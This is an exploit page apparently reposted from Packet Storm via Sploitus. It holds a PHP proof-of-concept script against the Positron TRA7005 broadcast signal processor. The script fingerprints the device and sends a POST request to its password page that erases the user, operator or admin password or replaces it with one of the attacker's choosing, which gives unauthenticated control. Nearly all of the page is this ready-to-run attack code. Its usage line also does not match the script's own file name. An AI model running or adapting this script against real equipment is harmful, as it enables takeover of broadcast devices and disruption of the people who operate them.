Share
## https://sploitus.com/exploit?id=PACKETSTORM:181855
=============================================================================================================================================  
| # Title : Positron Broadcast Signal Processor TRA7005 v1.20 5.1.6 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits) |  
| # Vendor : https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Cross-site request forgery causes authentication bypass in Positron DSP (TRA7005)   
  
[+] save as poc.php  
  
[+] Usage : C:\www\test>php 3.php poc.php  
  
[+] payload :   
  
<?php  
  
// التأكد من أن الوسائط صحيحة  
if ($argc != 4) {  
echo "Usage: php positron.php <ip:port> <user/oper/admin> <erase/new_pwd>\n";  
exit(1);  
}  
  
$ip = $argv[1];  
$ut = $argv[2];  
$wa = $argv[3];  
  
// التحقق من نوع المستخدم  
$valid_ut = ['user', 'oper', 'admin'];  
if (!in_array(strtolower($ut), $valid_ut)) {  
echo "Invalid user type! Use 'user', 'oper', or 'admin'.\n";  
exit(1);  
}  
  
$url = "http://$ip/_Passwd.html";  
$did = "http://$ip/_Device.html";  
  
// التحقق من الجهاز ومعرفة ما إذا كان الهدف ضعيفًا  
$response = @file_get_contents($did);  
if ($response === FALSE) {  
echo "Error checking device.\n";  
exit(1);  
} elseif (strpos($response, 'TRA7K5') !== false) {  
echo "Vulnerable processor found!\n";  
} else {  
echo "Not Vulnerable or not applicable. Exploit exiting.\n";  
exit(1);  
}  
  
// إعداد رؤوس الطلب  
$options = [  
'http' => [  
'header' => [  
'Content-Type: application/x-www-form-urlencoded',  
'Accept-Language: mk-MK,en;q=0.6',  
'Accept-Encoding: gzip, deflate',  
'User-Agent: R-Marina/11.9',  
'Accept: */*'  
],  
'method' => 'POST',  
'content' => '',  
],  
];  
  
$payload = [];  
// إذا كان الهدف مسح كلمة المرور  
if (strtolower($wa) == 'erase') {  
$payload['PSW_' . ucfirst($ut)] = 'NONE';  
} else {  
// إذا كان الهدف إعداد كلمة مرور جديدة  
$payload['PSW_' . ucfirst($ut)] = $wa;  
}  
  
$options['http']['content'] = http_build_query($payload);  
  
// تنفيذ الطلب POST  
$context = stream_context_create($options);  
$result = file_get_contents($url, false, $context);  
  
if ($result === FALSE) {  
echo "Failed to send the request.\n";  
} else {  
echo "Response:\n";  
echo $result;  
}  
?>  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================